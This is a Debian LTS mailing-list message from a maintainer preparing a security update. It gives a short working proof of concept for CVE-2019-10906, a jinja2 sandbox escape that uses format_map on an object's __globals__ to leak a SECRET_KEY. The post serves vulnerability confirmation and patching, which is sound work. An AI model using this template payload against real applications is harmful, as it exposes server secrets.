CVE-2019-10906 - jinja sandbox escape poc

To: debian-lts@lists.debian.org
Cc: 926602@bugs.debian.org
Subject: CVE-2019-10906 - jinja sandbox escape poc
From: Hugo Lefeuvre <hle@debian.org>
Date: Mon, 8 Apr 2019 09:29:30 +0200
Message-id: <[🔎] 20190408072930.GA10703@behemoth.owl.eu.com.local>

Hi,

I'm working on a potential jinja2 Debian LTS security update. Here is a
proof of concept which allows to easily reproduce the issue. This should
help confirming vulnerability in other suites.

>>> from jinja2.sandbox import SandboxedEnvironment
>>> env = SandboxedEnvironment()
>>> config = {'SECRET_KEY': '12345'}
>>> class User(object):
...     def __init__(self, name):
...             self.name = name
...
>>> t = env.from_string('{{
>>> "{x.__class__.__init__.__globals__[config]}".format_map(dic) }}')
>>> t.render(dic={"x": User('joe')})
"{'SECRET_KEY': '12345'}"

Expected behaviour would be jinja2.exceptions.SecurityError.

Adapted from[0].

regards,
 Hugo

[0] https://palletsprojects.com/blog/jinja-281-released/

-- 
                Hugo Lefeuvre (hle)    |    www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C

Attachment: signature.asc
Description: PGP signature

Reply to:

Follow-Ups:
- Re: CVE-2019-10906 - jinja sandbox escape poc
  - From: Hugo Lefeuvre <hle@debian.org>

Prev by Date: Re: Debian LTS logo
Next by Date: libvirt / CVE-2019-3886
Previous by thread: LTS report for March 2019 - Abhijith PA
Next by thread: Re: CVE-2019-10906 - jinja sandbox escape poc
Index(es):
- Date
- Thread